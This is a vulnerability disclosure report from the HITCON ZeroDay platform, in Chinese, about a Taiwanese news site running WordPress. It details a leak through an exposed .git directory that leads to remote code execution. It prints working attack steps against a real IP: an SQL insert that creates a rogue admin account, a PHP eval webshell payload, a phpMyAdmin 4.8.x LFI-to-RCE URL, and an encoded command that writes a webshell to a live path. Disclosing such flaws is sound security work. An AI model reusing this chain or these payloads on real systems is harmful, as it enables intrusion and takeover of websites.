台灣好新聞 Information Leakage to Remoto Code Execution - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-01485
  •  發信 Vendor: 大運聯和國際有限公司
  • Title: 台灣好新聞 Information Leakage to Remoto Code Execution
  • Introduction: Information Leakage to Remoto Code Execution

處理狀態

目前狀態

公開
Last Update : 2018/11/29
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2018/09/29 18:04:25 : 新提交 (由 Hzllaga 更新此狀態)
  • 2018/09/29 18:27:44 : 新提交 (由 Hzllaga 更新此狀態)
  • 2018/09/29 18:29:26 : 新提交 (由 Hzllaga 更新此狀態)
  • 2018/09/29 18:36:04 : 新提交 (由 Hzllaga 更新此狀態)
  • 2018/09/29 18:45:15 : 新提交 (由 Hzllaga 更新此狀態)
  • 2018/09/29 18:46:31 : 新提交 (由 Hzllaga 更新此狀態)
  • 2018/09/29 18:47:17 : 新提交 (由 Hzllaga 更新此狀態)
  • 2018/09/29 22:45:37 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/30 22:48:24 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/30 22:48:24 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/11/29 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-01485
  • 通報者:haihai (Hzllaga)
  • 風險:高
  • 類型:資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.taiwanhot.net/.git/index
http://45.32.46.46/phpmyadmin/

敘述

圖片
圖片

本來在想著要審計一下程式碼,看起來是wordpress二次開發的,訪問了一下ip,看到是個nginx默認頁,又習慣性的輸入了/phpmyadmin/,竟然真的跳出來了,應該是管理員為了方便上傳上去的

首先來看這個Wordpress,直接加一個密碼為123456的帳號:

INSERT INTO `th_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('247', 'haihai', '$P$BWuw4BzbmVKNulx6lsTPWXD2oL7.ze.', 'Hzllaga', '', '', '2015-09-03 00:00:00', '', '0', 'Hzllaga');

然後配置權限:
圖片
登入後台:
圖片
不過這個後台很多功能都閹割了,例如上傳主題、編輯程式碼等等,直接訪問相關頁面也提示沒權限,但是依然可以利用這個git洩漏來RCE

這裡就要用到團隊裡呆哥挖到的洞: phpMyAdmin 4.8.x LFI to RCE
到pma執行:

select '<?php eval($_GET[haihai]);exit;?>'

圖片
然後LFI緩存:

http://45.32.46.46/phpmyadmin/index.php?haihai=system(id);&target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_d66e2qu8ge0eg42mh841kcvfab

成功執行id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

通過執行

http://45.32.46.46/phpmyadmin/index.php?haihai=system(%27echo%20UEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiU0hwc2JHRm5ZVjBwT3o4Kw==%20|%20base64%20-d%20|%20base64%20-d%20%3E%20/home/www/www.taiwanhot.net/webroot/wp-content/uploads/2018/09/Hzllaga.php%27);&target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_d66e2qu8ge0eg42mh841kcvfab

成功寫入webshell到:

https://www.taiwanhot.net/wp-content/uploads/2018/09/Hzllaga.php

圖片
滲透過程就到這邊吧

最近政治好像挺亂的,新聞網站安全更要做好。。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;